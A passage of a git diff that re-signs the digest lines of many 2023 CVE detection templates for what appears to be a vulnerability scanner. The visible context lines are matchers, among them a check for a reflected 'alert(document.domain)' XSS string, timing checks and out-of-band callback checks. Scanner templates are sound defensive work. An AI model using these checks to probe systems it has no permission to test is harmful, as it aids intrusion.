4b0a00483046022100f10317bc778c143c3d7478b59fe0b05d35be98354746dd591670fc3da0e14d1b022100cf2d8f74f7ce084df301605b9e617795d4618c88262e6f3ca007ba1480c1c520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204918fcacd2dd44975dd3bc7b60d45dabff1ae1ab08929be54428b57a9a5d953c022070c97f7fed976c184f8c5b4f10b28dd36fb1acdbe6eb625b45b272ce39401e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 0270804031..daf25ee931 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -60,4 +60,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 4a0a00473045022100c3031ce2694ea298cae571806359cd762818fe85e602bfbe76c2c2d7e0b228f00220120f98c33381b0abc660138bef1a04a77b197e0dc137498a4f1201bdd99c0769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa8558e60f3a24e5c759b1c66eaa53fe541909c23b8a9474cd83859af83a17402203bd5c9b2dc67d75e6a403a686a29689ed5be4fc63294981c5fe8107ca0a8275b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 275e01e0fb..4459074dfd 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -57,4 +57,4 @@ http: - status_code == 200 - len(trim_space(body)) == 106 condition: and -# digest: 490a00463044022027bbbb37fc821c50655b071bef1a2bf081ddc50fb8473bae86f68d983d389ad7022009ffe3bc97a7e6c05d11866250e415c88d3a2c321554737feb16f1ccb2d50a6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca404bb788ee99d73bae3af87c527baa9ea28205f053f9421747d5dcaec661de022100cd744886e5ac523b6e265391565b850abd75ec30a28faccd1a01ba9157be31cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index a461f33987..5bf1da9a13 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -58,4 +58,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 490a004630440220231dfa335a027f270199925553ccb0928bc3b01871e5736ba629f40ad0ebb75c0220406e03fdb933e233d4a74fd3259905198f64755be40f8d47debe0308ee6589ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203712c3e6d9bf145113c7e3754c7f090fa138024a13a265a0477b89b052d66d410220056aaa4e34b2de2079842b08d7fa6f30e7f7aa401cc7766e4e835b019e6b3ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 0821da32d7..d153654f59 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -67,4 +67,4 @@ http: - Email - IsSiteAdmin condition: and -# digest: 490a0046304402203e666a0b9715202ee359d1fd474d260eda571d7d312dab6ba7de3a0a4b308a3602206ee8a80fa4e39d57247a3ec6b3a19b05b62f7c67683f1f74b42ff6efa0721df2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e5885208c05b6d7691f6472872c90f7bd98934d49cf8acc2fe54dc7af494a5a022039ac89a839d6dade6f9332a46b69101efd08e8aa30c7ce99d51ad56a9d6c4416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index b49346549b..4ac2dce220 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -48,4 +48,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save")' condition: and -# digest: 4b0a00483046022100f7cadcbcaa1a7665229854ebaa4d08fcf1f2b6fb6a15908df680b2d446b0b86202210083954a6783e65764efc3588e55d8ea452bf55242625f493136254ed1883cffd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f75ee0bf3548c6e7595f29a72d38b6dd4442e39a8f5b2f583c8c7a314bedc42c022000d638474aa0e1e916e4216405f28f871f3d48cda2d19cb51b36dc1e7a2b5b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 9be93486ee..a3e202a1eb 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 400 -# digest: 4b0a004830460221008376e46452318581c50834298bceb24539a0418601492e3ae72e6904f41fc18a0221009541094acf9e27d674a191eca9493d663d23bb9ce30b468cd40a06c56d1e0196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200eeb293fb45080f8fe24ade360d2b725f37f3fe91271d74d972c46e7d5e439f802202a1364e4da300a7118361484b5e10c047d1a545d6dff08b59ed2989b090de0d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index feb36ac837..89d7068e3c 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -46,4 +46,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "openemr")' condition: and -# digest: 480a00453043021f50082774b8a04fe0da88764e4cf37faa12f335b2161b2c5a4f8cfc8a07243e0220618e372046f1e82da6220c6a51af3312cf3bd8be2acdd8d3a99c1768bbb5bf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220500a6ac69d9b91d6545f65f7bcafcf9b7188f224274078078fb6020f34c0bc99022100d60da773d8a14a171a971b57098100a9f6589bef9610c2d6b7549c8859f0fa08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 56a2e6cb1e..4d3bdb8509 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -45,4 +45,4 @@ http: part: body words: - "You are viewing page number" -# digest: 490a0046304402203b0d567d7b052cf62884dfcdc0e21acfb8536feb3229ec67fe84d1c196e98d1802202c527d6fcfe222cfe243a865c16f552f10e595e0539804f9d3bf191a972b7e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040fbd22e716c79b0a20e657462a64ef99f5cd107f15eb5f771858c4851b9044e022100ecf3549f0a01b1fa01303dae9809365f29e5ea69118cf7de34bd0ca2e9ba9614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index eb78bf2d4e..e71dbf7b00 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200222f56a5044bb3a018ef5451cbc61aa44e58341f8e85b5120fba2332dc8a57b0220349c5a2c3e0ac6778bf1d3344349a0b06dad52bbf12d4fb0534ecd56b3bad6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2b60a759d1ea30666861f4fe152a5da9c502f8a2dae5e08a1f196fbb87c8fd5022030315f3ca3d819532851d2c6b5affe83eab39e97b60b9b4e65709c2b22b10ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 1c98a43ed6..a711f9507a 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e941ced09ce8917e972560b5828553b40a72918b13273cc08f4f262919ae16e8022100c1576c24d5b7aa9f220ae12b1eac49850b3f6fc175c608150d0f1351110a9b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200551a619de394d4d567ac4e528391a61d1f79adb6342a9c1a59e529d5caec602022100bfa2585de4b197ec63b527a877403c3e33c6b89112787f02e57ffa692bdcc2bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index c38309c6a9..5fbb00ff33 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022008b18b847db968082c86449021bb14ed029390e8de0a2accc64eaa62424f94750221009691a1cb12ea29b0fbc1ede7da1a63f955ec6af74157a14bc83cc16989e1e410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008812501948bfde98e323a23aa07dff8cc2f85c867074eb9052aec2e781cfc1cb022100a1dfc72abb0b477705b0c37bb64cf66467246032b66f4dd5e70f8da86074d509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index ff89efb7d1..8a2fe3d1ef 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 422 -# digest: 4a0a00473045022100a4c72352b5a278fe9fe14d659d3e7eca5ceeff07f6a2cdae1fb97ac844bc66da02201d4636487109429fb610844b1c7d86e88b9231569dc4c3d0483183c083d3c341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcedd4242d544537d56ad8d01e3272d6b737174013bbf66cea92b5ad411e9226022100ba3a4d4ee9e1b3b273437af26884efe235c0274765bb95446942e4046f45d8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 816822ceed..18cd1008ff 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -49,4 +49,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4b0a00483046022100b46183e33550da37ab7121e63b0622beb705ae54ab98563678cad4f92a273dec022100f6a8e4c8d114c476ea6f14bc62d7ebad0a6dbcaa64328c6f3f939d38b044bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086e5803369de03399b175dfff1f307f08d600d62f63e9173feee293e5989703702202117112bf80dd12f3b62170d2bbef25c52244259fca3902e92b9a05a70fd8a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index c9d911f06a..74f467cbd5 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -85,4 +85,4 @@ http: regex: - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]" internal: true -# digest: 4a0a00473045022100b87815b376eff87b8e81df4dbc125c91882942b0ba9bb3eb743effb574e34d0302206611b8e3bd562e81d0122a40bb24d240ddbf05ace217f252d72d48bdb2998b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083008a3793277d849d64ea59458090e4fd2be2ad78e2a8606675d58d5304f386022015a1039607a70aeb3c85adaa3626ab3b72da216d97120e78bbd5267c1c565608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 24c1284829..8af1e6891f 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -57,4 +57,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100b510c150d2e6cf0b4697b44beac3cd589f45d6b26e082db5fb5a9c09303736450220465ca9ff102223548c23048a8590c767a10c739760ab78088e6b4aa5471d3cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091171dd408267411cabc960e5d1ff9a6cc6299020dff9d29668209282afd775f022051476c3f6fb097be3888576aec86db55ea003b433678d3b51cb06dd8d2f3794d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index fcde066731..cbc4eced14 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -83,4 +83,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true -# digest: 4b0a00483046022100828b6422250d2f0eacad42dfc9ff5b621925a0ab9d28201028af494122f7bfb1022100f3cc921066d9381b2950d12a50afc826e89e0f2e75e88beb79a203e155006b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220746984a5ba9bde1458e109d2aa1e09cf2c9d344a97074d263836f7a56d72cb440220444a9d8b85eedfe739e6caf0faa3c4d580917fce8252564ae6a16b62d9e1c0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index e94820fbf6..94ef873a7d 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100be68b55db3ad67605b5ce4332184521018201647893335d9470193350f1834ac022100ffc9632c452c6b140662e7de2b32f211f15c2ac980d78a100a02880909a73a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbe4ace80cde1e29fc29ac4d1e6f074aeae9ff82f6623c1684d84ae94fe4388a022100b484e439856284c6477913f83350c973bd6c7885acf29be352872757737659fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index a8d6cb6e23..8d35f7059f 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -47,4 +47,4 @@ http: - type: regex regex: - "^OK$" -# digest: 4a0a00473045022100b412c7a9620de402b8322d4bbe35449064130bda28901dc50fd28f2a54b930960220306ddf4ede99885b0a0aa2d242b0f239a1b4fd44810791fc73d706723914f12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207552813231c8cd4ce36e81ce6020b8fb240bbb0de7ddba8012b8ef319aaeecbe022100b7953d7c39b75c5fcbf86321660e8ae8c440cd2332db415f2fbabb65aa1b5ec4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index abd37ce460..4e7e9a12a7 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -40,4 +40,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and -# digest: 490a00463044022022bb6a32bbe67ce63f09a569ea77dbc532a426bb9ee2a6e51aceb5faf05842a40220632654660f5d4f4a8430ed0af848009258f9b5297792356180d1c9f6dfca60d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d63b3ce01cf22987b6cf64df037911bfc94b9680dab796149106c4f2f5d77d5022100eac15d1f9d58ec0bfff470c26143a947c37a8eddb07d75c9f73b28c07ee0c1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index f52cf4c9b6..14bb0297ba 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022015d82fb8acb7bfa5aef151775c007ac7392755232b3b58e59c3691a6719c2f76022100d6ddfb3d581b73eeae01ec24e9fd1bc7148176fd2e0936619bb5b8089a442dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fd37b8f5b61f1b2b5e068d1d960779229bbe02aa80d3409b0df488b194dc59902207b86a8a61fe12433d239e9baeab759fda69bc1ca07f54f9a5c0e1c51ea8473d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 0ea1ccec7b..2ea5a84040 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbca3a5b5a8ac4a7eaafda3c2cbe5cc873d6cd67352a064da2ef31df6ea2f873022049978a0eed228cc990d6f36ac90840521f77cb40a3a5003d32717cb5f1b9b343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d9ed3064bcd327602a7875a9ddb31977e70e750115974413440ce5bbf1889800220730e9fb8ec81413a05f5827e7357d6c60d56eb35b55a5cbc956473a69dd9fc02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index ab68aac4e5..2b732ca387 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8a2187eee029f0b7de9882ee0c9c883e781051896f19ca21d4a0a64281583d5022100e889424a42a8a9f8303d12b5e470510e2240db26e1798ffb17a30377a3545aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f46350a76d4e9345ad71b36049882b6db03da4ba70de2031b8571c5509e1e50022019d5ad1a41e7bd689e702bcca7215ae184e92e401ab005b6dc29345a8ea07954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 3b8946f312..125a2ac99c 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -50,4 +50,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 490a004630440220010a42dcc79d3f304caa62a907714a428e2a193d274b69fce7dc0cfe4cda97880220765de31c96bf2c968cb53f751fc2f3900eb928d56e97ce5edc301442091ff3ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ab4c628873460f2450f08b11e80f078a6d0897b010d8398a0e924934fa472ad0221008f8a015712102adee570ab25cbaa41f8b3a5b382718f672cb82b4c1c5698c6a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 77fe2d1c07..592f7f39fb 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -79,4 +79,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100f131e049a903929669620739a042ef371cc53d14f7e330b5b1dd0a50032adb2e022100c65b26151fa200111cc70cbf4e292e7de91799cdd5ec182bf139fc69896ec655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204203ba81fa59deac5f8f0d0493727281f224ec0c682985a92a6e5399f6744213022100a8aec5d2c5159a5d6ec7bda077faa90c224689b24475f9cd3d24b1e18eed12b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index dc4149375c..554c2161cf 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204906769baaa40653efd8db40c78d1b7a5edc2464a567a9dee1b23c10b735a8f502200e663a070de2ca910bc6c3e9b9736ab7f055c56b105bde2cac618eadf82664f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203ecc9e2539c4ae2f8e80d3d097bd798fb303f0d202dbb192204c255ee474b6ea022100fb05e48650addf82e05cd993eb891e678cccb6e80b9780fb1215286f02fc549f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index a10061d300..e178faefb9 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -68,4 +68,4 @@ http: part: header_2 status: - 200 -# digest: 4a0a0047304502206e6e2e31f12f413d607f331c70a813d47580ec6ec53dcce86d690fd6505686a2022100bbd8564bab04300d1f08a1cf09442181e45d39f92e9b67e9190f3b16b34ed363:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d1c08a0e387f7a0f13c9ada8e2f597b8aec1b31bfbd57e342a5f4cf34b5da26022027268948a9b4484fb12ec8b0efeb9af7f007fde3a69b72d77d87c4e73dfcf8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 3537e12045..bdca1869aa 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -62,4 +62,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "HotelDruid")' condition: and -# digest: 4a0a004730450220594727b9aa1101988289ccadc4c1c6546c46c0670893e0695189c996466496920221008e5888788e8db0931ef0643410d2ae1a34c6293b915967180eecc5b282857d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3f3315840ceba00d13b5c5ce93a76c9259e008ef9c8bf5692c813dd0b0ab6d9022100b7cbb68c5ca5cf00ed6c8019434f98066908a67db28e95506ba539e884464996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 14cf10c76f..fc33cfc46a 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ca220a11f960573e2129266cde12324d410026c5d5d0587bfce9b5847c87409022100f2ef58a2d030365cd3311aed103b93e2a9fbde99170d36a6d5dbb99d50abff41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e109ccf0a50716484e972ba9e89838a49010d879762fc41193f517518acdc4dd0220531108ca8ef31c09920ca876751c47ab0893e4ea3088c3c5bbfd1cf18c1a7e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index be7ab029a6..52e4c14722 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -88,4 +88,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045b390f5760ae270e3a2519cce300ec389e0ee56fd2db189cdb00dfa65cfad0c02201654dcbabab3dd638bdef30d973d90eaa2bb5315592d3abc7059c6dbe3973959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202974a145b40ba9985926a27dc907325442449e624ece6d16be8a7afc9354b809022061ae90666c104b8a80cc8c011bfb5f953dc09e7cb670858292cad5cdd64d31b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index e758b81ded..6660a05ef1 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4b0a004830460221009948aee763684825bc9b30c6fe75b736a1088ac0214c3264894147e3b56d685f02210092dffec3ee044843ce64c7a4d9fcc0353ccb52eea84a40cb6c8f5fa130d0ec81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f402a184b02428f1b3b77596205e4955498c3f9860feb5e216df13d55caad7f0221008ca0a4f3fcef19808e026dd67522e147fa57ea364fe8b1d5b96a3579e23554ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 00bf05ef97..3de67af58d 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -54,4 +54,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a00463044022004a81e5709fff9b5aa23e045c78c35817e5dbc8812da316c1c51e94ff787290702206dc169530141429140ce90a9e66c6dc159adbaa396626fccea387b98bca761ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030bf54a98de12d6a8cbe3a62a7867a738139405cafddbeada35786671990f41302207b218e6af53247a81c33446d5f51a7e4fba79b922726da92806dc2b13ddeef23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 87d9aa7d64..060fa03f11 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 4a0a00473045022050966a0d4c22ad96e6b4dc9b6776bc3be3ead136f9b455a1af5324a51b9ab6f8022100d09acb65cf947baaafa685326925167947592152796d14ac68e70bf9665f8efa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9e0a231234787b15b648a6dfecaeec34f61f735603c1645561714de11ce66e6022007b345d1312a924c1bb7cdf413ffd7a61febb92459a3facc5a9789caa6e967d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index 439a14a16c..8f7c709f6b 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -52,4 +52,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'bloofoxCMS Admincenter') condition: and -# digest: 490a00463044022048ef5100fdc4d5780eb5f4cfdf714c6104252db498c8096382ebdc158fd4b00e02200928fd94715a0774521522f3f39adc16f83e3d3c20fc9fb500b25d604baf9495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032f9ef103860ed8443efeacbaf4866b3fd14fd37d2516e607080b5c04ec0bb6d022100a0faf26e8239032272fddd3087a50d7c435351f7f708238c8a7161b260ceab53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index 506327665e..0f0b45fc1e 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -53,4 +53,4 @@ http: - contains(header, "text/html") - contains(body_2, 'Admincenter') condition: and -# digest: 4a0a00473045022100faf8f6ee6e838ca74e557254d5f6eb4d65a2b88c1db9ee61c42ba55d99a43adc0220396cf436a61c0b7d7687b1a0d744f99bd6ff57ebb60acdb17400dc7b69304ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1803d30aa04646f293cfa1056675d9ff48d6c5b3292d05e0248b3bda92d5158022012461a8f49d686040da02bcf1fb55825bb9ae2bc3b76d8fa3e6747e2f229edd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index c23a6baed8..a8a9b783f2 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f1877788ae671ddcc6c5dbdcc650342aaf360eb349e967a586cf75858aab932c022100ba0dfed6f83494f955107a535f7b557ef0bb3d87bd2f5e6e9e1c9012d96c351e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f455524bdd08b261a7ac9ae06489916ec86682f339632160689c6ea834fb104022100fa4a8034622c08b9ae97a765b2cf660b9fc3ef6471f3f045ae0a2c5cbf5a67a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index ebe0371f12..52a7db87ab 100644 --- 